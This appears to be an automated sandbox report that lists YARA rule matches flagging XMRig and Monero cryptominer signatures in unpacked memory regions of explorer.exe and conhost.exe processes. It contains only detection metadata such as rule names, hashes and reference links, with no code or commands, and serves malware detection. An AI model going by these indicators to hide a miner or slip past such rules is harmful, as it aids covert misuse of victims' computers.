Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
